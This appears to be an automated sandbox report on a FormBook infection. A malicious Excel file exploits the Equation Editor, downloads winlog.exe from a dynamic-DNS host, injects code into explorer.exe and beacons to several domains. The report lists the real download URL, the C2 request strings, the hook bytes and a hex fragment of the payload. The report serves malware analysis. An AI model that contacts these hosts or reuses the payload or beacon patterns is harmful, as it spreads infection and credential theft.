                                                                                                                                                          Jan 27, 2021 07:59:30.113028049 CET4916780192.168.2.22103.125.191.208
                                                                                                                                                          Jan 27, 2021 07:59:30.113065004 CET4916780192.168.2.22103.125.191.208
                                                                                                                                                          Jan 27, 2021 07:59:30.335398912 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.335453987 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.335498095 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.335537910 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.335575104 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.335609913 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.335649014 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.335694075 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.335747004 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.335885048 CET4916780192.168.2.22103.125.191.208
                                                                                                                                                          Jan 27, 2021 07:59:30.335918903 CET4916780192.168.2.22103.125.191.208
                                                                                                                                                          Jan 27, 2021 07:59:30.335925102 CET4916780192.168.2.22103.125.191.208
                                                                                                                                                          Jan 27, 2021 07:59:30.335930109 CET4916780192.168.2.22103.125.191.208
                                                                                                                                                          Jan 27, 2021 07:59:30.335933924 CET4916780192.168.2.22103.125.191.208
                                                                                                                                                          Jan 27, 2021 07:59:30.335938931 CET4916780192.168.2.22103.125.191.208
                                                                                                                                                          Jan 27, 2021 07:59:30.336018085 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.336060047 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.336096048 CET4916780192.168.2.22103.125.191.208
                                                                                                                                                          Jan 27, 2021 07:59:30.336097002 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.336113930 CET4916780192.168.2.22103.125.191.208
                                                                                                                                                          Jan 27, 2021 07:59:30.336139917 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.336153984 CET4916780192.168.2.22103.125.191.208
                                                                                                                                                          Jan 27, 2021 07:59:30.336177111 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.336214066 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.336215973 CET4916780192.168.2.22103.125.191.208
                                                                                                                                                          Jan 27, 2021 07:59:30.336224079 CET4916780192.168.2.22103.125.191.208
                                                                                                                                                          Jan 27, 2021 07:59:30.336261988 CET4916780192.168.2.22103.125.191.208
                                                                                                                                                          Jan 27, 2021 07:59:30.338761091 CET4916780192.168.2.22103.125.191.208
                                                                                                                                                          Jan 27, 2021 07:59:30.557471991 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.557527065 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.557568073 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.557606936 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.557646036 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.557694912 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.557722092 CET4916780192.168.2.22103.125.191.208
                                                                                                                                                          Jan 27, 2021 07:59:30.557732105 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.557755947 CET4916780192.168.2.22103.125.191.208
                                                                                                                                                          Jan 27, 2021 07:59:30.557761908 CET4916780192.168.2.22103.125.191.208
                                                                                                                                                          Jan 27, 2021 07:59:30.557770967 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.557785034 CET4916780192.168.2.22103.125.191.208
                                                                                                                                                          Jan 27, 2021 07:59:30.557810068 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.557828903 CET4916780192.168.2.22103.125.191.208
                                                                                                                                                          Jan 27, 2021 07:59:30.557857990 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.557868958 CET4916780192.168.2.22103.125.191.208
                                                                                                                                                          Jan 27, 2021 07:59:30.557902098 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.557918072 CET4916780192.168.2.22103.125.191.208
                                                                                                                                                          Jan 27, 2021 07:59:30.557940006 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.557952881 CET4916780192.168.2.22103.125.191.208
                                                                                                                                                          Jan 27, 2021 07:59:30.557977915 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.557995081 CET4916780192.168.2.22103.125.191.208
                                                                                                                                                          Jan 27, 2021 07:59:30.558015108 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.558032990 CET4916780192.168.2.22103.125.191.208
                                                                                                                                                          Jan 27, 2021 07:59:30.558051109 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.558067083 CET4916780192.168.2.22103.125.191.208
                                                                                                                                                          Jan 27, 2021 07:59:30.558089018 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.558104992 CET4916780192.168.2.22103.125.191.208
                                                                                                                                                          Jan 27, 2021 07:59:30.558125973 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.558140993 CET4916780192.168.2.22103.125.191.208
                                                                                                                                                          Jan 27, 2021 07:59:30.558173895 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.558191061 CET4916780192.168.2.22103.125.191.208
                                                                                                                                                          Jan 27, 2021 07:59:30.558218002 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.558243036 CET4916780192.168.2.22103.125.191.208
                                                                                                                                                          Jan 27, 2021 07:59:30.558255911 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.558269024 CET4916780192.168.2.22103.125.191.208
                                                                                                                                                          Jan 27, 2021 07:59:30.558295012 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.558314085 CET4916780192.168.2.22103.125.191.208
                                                                                                                                                          Jan 27, 2021 07:59:30.558335066 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.558372021 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.558379889 CET4916780192.168.2.22103.125.191.208
                                                                                                                                                          Jan 27, 2021 07:59:30.558397055 CET4916780192.168.2.22103.125.191.208
                                                                                                                                                          Jan 27, 2021 07:59:30.558410883 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.558449030 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.558453083 CET4916780192.168.2.22103.125.191.208
                                                                                                                                                          Jan 27, 2021 07:59:30.558495045 CET4916780192.168.2.22103.125.191.208
                                                                                                                                                          Jan 27, 2021 07:59:30.558499098 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.558542013 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.558578014 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.558600903 CET4916780192.168.2.22103.125.191.208
                                                                                                                                                          Jan 27, 2021 07:59:30.558624029 CET8049167103.125.191.208192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:30.558645010 CET8049167103.125.191.208192.168.2.22

                                                                                                                                                          UDP Packets

                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                          Jan 27, 2021 07:59:29.305275917 CET5219753192.168.2.228.8.8.8
                                                                                                                                                          Jan 27, 2021 07:59:29.376153946 CET53521978.8.8.8192.168.2.22
                                                                                                                                                          Jan 27, 2021 07:59:29.376570940 CET5219753192.168.2.228.8.8.8
                                                                                                                                                          Jan 27, 2021 07:59:29.426273108 CET53521978.8.8.8192.168.2.22
                                                                                                                                                          Jan 27, 2021 08:00:35.312803030 CET5309953192.168.2.228.8.8.8
                                                                                                                                                          Jan 27, 2021 08:00:35.380446911 CET53530998.8.8.8192.168.2.22
                                                                                                                                                          Jan 27, 2021 08:00:55.498152018 CET5283853192.168.2.228.8.8.8
                                                                                                                                                          Jan 27, 2021 08:00:55.643100977 CET53528388.8.8.8192.168.2.22
                                                                                                                                                          Jan 27, 2021 08:01:16.340821981 CET6120053192.168.2.228.8.8.8
                                                                                                                                                          Jan 27, 2021 08:01:16.411178112 CET53612008.8.8.8192.168.2.22

                                                                                                                                                          DNS Queries

                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                          Jan 27, 2021 07:59:29.305275917 CET192.168.2.228.8.8.80x5091Standard query (0)chise2neversndywalka.dns.armyA (IP address)IN (0x0001)
                                                                                                                                                          Jan 27, 2021 07:59:29.376570940 CET192.168.2.228.8.8.80x5091Standard query (0)chise2neversndywalka.dns.armyA (IP address)IN (0x0001)
                                                                                                                                                          Jan 27, 2021 08:00:35.312803030 CET192.168.2.228.8.8.80xa14dStandard query (0)www.thecreatorsbook.comA (IP address)IN (0x0001)
                                                                                                                                                          Jan 27, 2021 08:00:55.498152018 CET192.168.2.228.8.8.80xccffStandard query (0)www.diversitypatriots.comA (IP address)IN (0x0001)
                                                                                                                                                          Jan 27, 2021 08:01:16.340821981 CET192.168.2.228.8.8.80x2e78Standard query (0)www.jewishposter.comA (IP address)IN (0x0001)

                                                                                                                                                          DNS Answers

                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                          Jan 27, 2021 07:59:29.376153946 CET8.8.8.8192.168.2.220x5091No error (0)chise2neversndywalka.dns.army103.125.191.208A (IP address)IN (0x0001)
                                                                                                                                                          Jan 27, 2021 07:59:29.426273108 CET8.8.8.8192.168.2.220x5091No error (0)chise2neversndywalka.dns.army103.125.191.208A (IP address)IN (0x0001)
                                                                                                                                                          Jan 27, 2021 08:00:35.380446911 CET8.8.8.8192.168.2.220xa14dNo error (0)www.thecreatorsbook.comthecreatorsbook.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                          Jan 27, 2021 08:00:35.380446911 CET8.8.8.8192.168.2.220xa14dNo error (0)thecreatorsbook.com184.168.131.241A (IP address)IN (0x0001)
                                                                                                                                                          Jan 27, 2021 08:00:55.643100977 CET8.8.8.8192.168.2.220xccffNo error (0)www.diversitypatriots.comdiversitypatriots.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                          Jan 27, 2021 08:00:55.643100977 CET8.8.8.8192.168.2.220xccffNo error (0)diversitypatriots.com184.154.206.199A (IP address)IN (0x0001)
                                                                                                                                                          Jan 27, 2021 08:01:16.411178112 CET8.8.8.8192.168.2.220x2e78No error (0)www.jewishposter.comjewishposter.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                          Jan 27, 2021 08:01:16.411178112 CET8.8.8.8192.168.2.220x2e78No error (0)jewishposter.com34.102.136.180A (IP address)IN (0x0001)

                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                          • chise2neversndywalka.dns.army
                                                                                                                                                          • www.thecreatorsbook.com
                                                                                                                                                          • www.diversitypatriots.com

                                                                                                                                                          HTTP Packets

                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                          0192.168.2.2249167103.125.191.20880C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                          Jan 27, 2021 07:59:29.668466091 CET0OUTGET /chnsfrnd2/winlog.exe HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                          Host: chise2neversndywalka.dns.army
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 27, 2021 07:59:29.891381979 CET2INHTTP/1.1 200 OK
                                                                                                                                                          Date: Wed, 27 Jan 2021 06:59:27 GMT
                                                                                                                                                          Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
                                                                                                                                                          Last-Modified: Wed, 27 Jan 2021 03:42:34 GMT
                                                                                                                                                          ETag: "e5000-5b9d98fc079e9"
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Content-Length: 937984
                                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Content-Type: application/x-msdownload
                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 2a e1 10 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 44 0e 00 00 0a 00 00 00 00 00 00 ca 62 0e 00 00 20 00 00 00 80 0e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 78 62 0e 00 4f 00 00 00 00 80 0e 00 ac 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 42 0e 00 00 20 00 00 00 44 0e 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ac 06 00 00 00 80 0e 00 00 08 00 00 00 46 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 0e 00 00 02 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 62 0e 00 00 00 00 00 48 00 00 00 02 00 05 00 98 43 02 00 f0 5b 01 00 03 00 00 00 01 00 00 06 88 9f 03 00 f0 c2 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 1d 00 00 0a 28 1e 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 1f 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 20 00 00 0a 00 02 16 28 21 00 00 0a 00 02 17 28 22 00 00 0a 00 02 17 28 23 00 00 0a 00 02 17 28 24 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 70 04 00 06 28 25 00 00 0a 00 2a 26 00 02 28 26 00 00 0a 00 2a ce 73 27 00 00 0a 80 01 00 00 04 73 28 00 00 0a 80 02 00 00 04 73 29 00 00 0a 80 03 00 00 04 73 2a 00 00 0a 80 04 00 00 04 73 2b 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 2e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 2f 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 30 00 00 0a 0a 2b 00 06 2a 26 00 02 28 31 00 00 0a 00 2a 00 00 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 32 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 33 00 00 0a 6f 34 00 00 0a 73 35 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00
                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL*`PDb @ @xbO H.textB D `.rsrcF@@.relocN@BbHC[0(((o*( (!("(#($*N(op(%*&(&*s's(s)s*s+*0~o,+*0~o-+*0~o.+*0~o/+*0~o0+*&(1*0<~(2,!rp(3o4s5~+*0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                          1192.168.2.2249168184.168.131.24180C:\Windows\explorer.exe
                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                          Jan 27, 2021 08:00:38.597898960 CET990OUTGET /aky/?MrIpf=y480GprHQ4MP&flX0DJ5=mHx4rV5tLr28MmvSGkxB9LVhRseCNR332GkcowizwEXSFPKeI/LlmY6x2m1vfw1VmIUMbA== HTTP/1.1
                                                                                                                                                          Host: www.thecreatorsbook.com
                                                                                                                                                          Connection: close
                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                          Data Ascii:
                                                                                                                                                          Jan 27, 2021 08:00:39.338448048 CET990INHTTP/1.1 302 Found
                                                                                                                                                          Server: nginx/1.16.1
                                                                                                                                                          Date: Wed, 27 Jan 2021 07:00:39 GMT
                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Location: https://devinricestudios.com/thecreators?MrIpf=y480GprHQ4MP&flX0DJ5=mHx4rV5tLr28MmvSGkxB9LVhRseCNR332GkcowizwEXSFPKeI/LlmY6x2m1vfw1VmIUMbA==
                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                          2192.168.2.2249169184.154.206.19980C:\Windows\explorer.exe
                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                          Jan 27, 2021 08:00:55.793685913 CET991OUTGET /aky/?flX0DJ5=05+amzhYswt9PeC6lvAIMRVwbnzaBXISDzTzfjSF7Rcoln5AjWTXUDXDqxezrh5vP7DX0Q==&MrIpf=y480GprHQ4MP HTTP/1.1
                                                                                                                                                          Host: www.diversitypatriots.com
                                                                                                                                                          Connection: close
                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                          Data Ascii:
                                                                                                                                                          Jan 27, 2021 08:00:56.218080044 CET991INHTTP/1.1 301 Moved Permanently
                                                                                                                                                          X-Powered-By: PHP/7.2.34
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                          X-Redirect-By: WordPress
                                                                                                                                                          Location: http://diversitypatriots.com/aky/?flX0DJ5=05+amzhYswt9PeC6lvAIMRVwbnzaBXISDzTzfjSF7Rcoln5AjWTXUDXDqxezrh5vP7DX0Q==&MrIpf=y480GprHQ4MP
                                                                                                                                                          Content-Length: 0
                                                                                                                                                          Date: Wed, 27 Jan 2021 07:00:56 GMT
                                                                                                                                                          Server: LiteSpeed
                                                                                                                                                          Vary: User-Agent
                                                                                                                                                          Connection: close


                                                                                                                                                          Code Manipulations

                                                                                                                                                          User Modules

                                                                                                                                                          Hook Summary

                                                                                                                                                          Function NameHook TypeActive in Processes
                                                                                                                                                          PeekMessageAINLINEexplorer.exe
                                                                                                                                                          PeekMessageWINLINEexplorer.exe
                                                                                                                                                          GetMessageWINLINEexplorer.exe
                                                                                                                                                          GetMessageAINLINEexplorer.exe

                                                                                                                                                          Processes

                                                                                                                                                          Process: explorer.exe, Module: USER32.dll
                                                                                                                                                          Function NameHook TypeNew Data
                                                                                                                                                          PeekMessageAINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xE2
                                                                                                                                                          PeekMessageWINLINE0x48 0x8B 0xB8 0x86 0x6E 0xE2
                                                                                                                                                          GetMessageWINLINE0x48 0x8B 0xB8 0x86 0x6E 0xE2
                                                                                                                                                          GetMessageAINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xE2

                                                                                                                                                          Statistics

                                                                                                                                                          Behavior

                                                                                                                                                          Click to jump to process

                                                                                                                                                          System Behavior

                                                                                                                                                          General

                                                                                                                                                          Start time:07:58:52
                                                                                                                                                          Start date:27/01/2021
                                                                                                                                                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                          Imagebase:0x13f7c0000
                                                                                                                                                          File size:27641504 bytes
                                                                                                                                                          MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Start time:07:59:12
                                                                                                                                                          Start date:27/01/2021
                                                                                                                                                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                          File size:543304 bytes
                                                                                                                                                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Start time:07:59:16
                                                                                                                                                          Start date:27/01/2021
                                                                                                                                                          Path:C:\Users\Public\vbc.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                          Imagebase:0xf20000
                                                                                                                                                          File size:937984 bytes
                                                                                                                                                          MD5 hash:A9AA5937E09501E97E40E0FCF97FAC55
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2167761188.0000000003418000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2167761188.0000000003418000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2167761188.0000000003418000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2167570783.0000000002411000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                          Antivirus matches:
                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                          Reputation:low

                                                                                                                                                          General

                                                                                                                                                          Start time:07:59:17
                                                                                                                                                          Start date:27/01/2021
                                                                                                                                                          Path:C:\Users\Public\vbc.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Users\Public\vbc.exe
                                                                                                                                                          Imagebase:0xf20000
                                                                                                                                                          File size:937984 bytes
                                                                                                                                                          MD5 hash:A9AA5937E09501E97E40E0FCF97FAC55
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2201051835.0000000000290000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2201051835.0000000000290000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2201051835.0000000000290000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2201088200.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2201088200.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2201088200.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2200951539.00000000000F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2200951539.00000000000F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2200951539.00000000000F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          Reputation:low

                                                                                                                                                          General

                                                                                                                                                          Start time:07:59:19
                                                                                                                                                          Start date:27/01/2021
                                                                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:
                                                                                                                                                          Imagebase:0xffca0000
                                                                                                                                                          File size:3229696 bytes
                                                                                                                                                          MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Start time:07:59:30
                                                                                                                                                          Start date:27/01/2021
                                                                                                                                                          Path:C:\Windows\SysWOW64\systray.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\SysWOW64\systray.exe
                                                                                                                                                          Imagebase:0x8b0000
                                                                                                                                                          File size:8192 bytes
                                                                                                                                                          MD5 hash:DF6923839C6A8F776F0DA704C5F4CEA5
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2379730656.00000000001F0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2379730656.00000000001F0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2379730656.00000000001F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2379462611.00000000000C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2379462611.00000000000C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2379462611.00000000000C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2379686421.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
